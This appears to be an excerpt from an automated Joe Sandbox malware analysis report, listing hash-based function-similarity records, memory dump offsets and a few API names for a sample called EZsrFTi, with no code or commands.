                              • Opcode ID: 5bcba2b6916a69f736edd97be17fe1c6803ed1f808eba87428d15b8c0623ecb1
                              • Instruction ID: 770b3c2a1171b53a1e95ad9f4b277d85647a37a8480f1c621dc665ed749926a5
                              • Opcode Fuzzy Hash: 5bcba2b6916a69f736edd97be17fe1c6803ed1f808eba87428d15b8c0623ecb1
                              • Instruction Fuzzy Hash: 4B51C1716083919BC729CF28D5617EBFBE1AFD6304F18896DD0C987342D7788905CB9A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 493c1171587784aab1950dc7a786e9e471f4be60286c380f6ab701eba1ee81d8
                              • Instruction ID: 26a041c5e2359bd87aed152d35076de60e9c8f76ecf55b57d9db7f0dfeac47fe
                              • Opcode Fuzzy Hash: 493c1171587784aab1950dc7a786e9e471f4be60286c380f6ab701eba1ee81d8
                              • Instruction Fuzzy Hash: 98416772A083245BEB10AA15EC4172FB7A9EF95718F10542EFE84A7352D334DC048BEB
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2925b3ff330583e597499ba1a4591a763adad796370e63afcebefc1de81bf6fe
                              • Instruction ID: 2dcf4af7993bda6ce9f107f5dc99bfe24a3ca610639a32364b69784d18d1cf74
                              • Opcode Fuzzy Hash: 2925b3ff330583e597499ba1a4591a763adad796370e63afcebefc1de81bf6fe
                              • Instruction Fuzzy Hash: E1419D1BA08AB046C324897D4841237FAD19FD9729F1A57EBECD45B3D1D12C8D0583D9
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0dda62e891e7ee33c7f6ae218ce2900f44faea19aed841d2bc7863eff8cc5fb0
                              • Instruction ID: 65f135b4b7740eafa1228b2c86321306a7245ca77e162839a5f402bf9c4f870d
                              • Opcode Fuzzy Hash: 0dda62e891e7ee33c7f6ae218ce2900f44faea19aed841d2bc7863eff8cc5fb0
                              • Instruction Fuzzy Hash: CB319375640001DBD728DB18FCD2A32B3B3FB8A358B645336D115A32E1D734FC268A59
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01c3ddd03c786211fe1bfc96dc94a8d57f7ee3977e859dc26b890c60a9ed4b5e
                              • Instruction ID: 76765fb7a9008b976e8578b923dda3f926c9dea9cae1d721c3bc7b7eaaecc1ae
                              • Opcode Fuzzy Hash: 01c3ddd03c786211fe1bfc96dc94a8d57f7ee3977e859dc26b890c60a9ed4b5e
                              • Instruction Fuzzy Hash: 5D41D5356183E08AE735CF25D8217EBBBE1ABD7304F58986DC5C897382CB3945068B97
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f76be10a378803b2f440d560f957399ed65297039dfb7de60a9548dd77461a2b
                              • Instruction ID: 15a922d31bf5397e57c57d2eb4afa6a78dba1d4a5b4fe5151ae25c7009868574
                              • Opcode Fuzzy Hash: f76be10a378803b2f440d560f957399ed65297039dfb7de60a9548dd77461a2b
                              • Instruction Fuzzy Hash: 0A1102704093918FDB228F3994607B2FFE0EF17310F2805CAD4E64B792C2299496DB9B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 067dd3f0a356ba77dbe2ef4fdf49273fe2fa1f65738edfc06acb4d27a21e6113
                              • Instruction ID: f95ccd5c1e07fdba5a6b1ce965763e3e344b5dd236464c9b7168bce5447a1aa5
                              • Opcode Fuzzy Hash: 067dd3f0a356ba77dbe2ef4fdf49273fe2fa1f65738edfc06acb4d27a21e6113
                              • Instruction Fuzzy Hash: 8601B1F170072197DB209E52A5C872FB3A9AF80708F09407EE85857342DB79EC0883F9
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e84e020e0a634013b8d590e9ec40e41bf577afccfe6903ce9e4ae7839292a078
                              • Instruction ID: c1e1313793d015acb42bf2898a4337a55ff5120e3969cd7936ff0a8dbd393111
                              • Opcode Fuzzy Hash: e84e020e0a634013b8d590e9ec40e41bf577afccfe6903ce9e4ae7839292a078
                              • Instruction Fuzzy Hash: AE0186305082D18FDB228F2994506B7BFE0DF5B310F0855D6D4D59F2C3C2298985C7A5
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1419fa78d6a1039748fef708a65309ac318c5c708fbaa929b64f3090d2871bb4
                              • Instruction ID: 83857050257fa79712498fa501624980af833af2fdaf7539a5b7ba836c1c0a1a
                              • Opcode Fuzzy Hash: 1419fa78d6a1039748fef708a65309ac318c5c708fbaa929b64f3090d2871bb4
                              • Instruction Fuzzy Hash: 29F0A4205082D18FDB238F2998602B7BFA0DF57310F0855D6D0E19F2C3C22A4985C7A5
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9b932f69be8761acc6f0aa65eb53a2ca056a1cc266c137de5ad9e8b6a91f1ef8
                              • Instruction ID: e2f8cf1c48d2213eb4d1dc5e0381a0ce5016700f3c7598892a362b01e8a2dc08
                              • Opcode Fuzzy Hash: 9b932f69be8761acc6f0aa65eb53a2ca056a1cc266c137de5ad9e8b6a91f1ef8
                              • Instruction Fuzzy Hash: 00F0A435A44304EBD6348B18D8417B7B3B2F7CB310F21972EE598532A4DB34AC528A5E
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 95fbf216a3c874508104a76c0cabc353cd83aac7d25e52a6b1a90389e7c88156
                              • Instruction ID: a598e38f4c58885c8d2f4209a48d3d433457380b3f8601a763830e9056b5a994
                              • Opcode Fuzzy Hash: 95fbf216a3c874508104a76c0cabc353cd83aac7d25e52a6b1a90389e7c88156
                              • Instruction Fuzzy Hash: E6F0247B7246160FE310DDBADC8457BB3A6D7C5214F29403AE490E3741E8B9E80192A8
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8a4e1023fcf9285f642157c2fc2208c4d3705142b58bc73f6611dc839cdeacd
                              • Instruction ID: 7145e085874b5d9d02a41695de230916bbf818278a9c2398993db132710a5c9e
                              • Opcode Fuzzy Hash: b8a4e1023fcf9285f642157c2fc2208c4d3705142b58bc73f6611dc839cdeacd
                              • Instruction Fuzzy Hash: C8F0F635E500018BD714DF38DC615BB77E2EB4A210F0D5579C512D7392EA24EC908788
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                              • Instruction ID: fbdf1c2c447d2bdf2fdf32038ffa8c2cf21e3f4cd619e72442ec6ce1d81cc30a
                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                              • Instruction Fuzzy Hash: D7D097345083A00EA7088D3800A04B7FBE8E983212B18188FE8E1E3289C224DC01429C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID: ou
                              • API String ID: 3664257935-3837949563
                              • Opcode ID: a485c630acd3f85f5e4c6cfda9c49240b56fe8590d8370fafad6b6e1bb297bec
                              • Instruction ID: 63f9b6ca4f083220e6d80fcdc0bbedb1e71f47889e472d57d7d51e72ea7c1998
                              • Opcode Fuzzy Hash: a485c630acd3f85f5e4c6cfda9c49240b56fe8590d8370fafad6b6e1bb297bec
                              • Instruction Fuzzy Hash: AAC0023D8D5401EBEF016FA0FE0D8183B75FB437067108034B90140136EA360970AE1F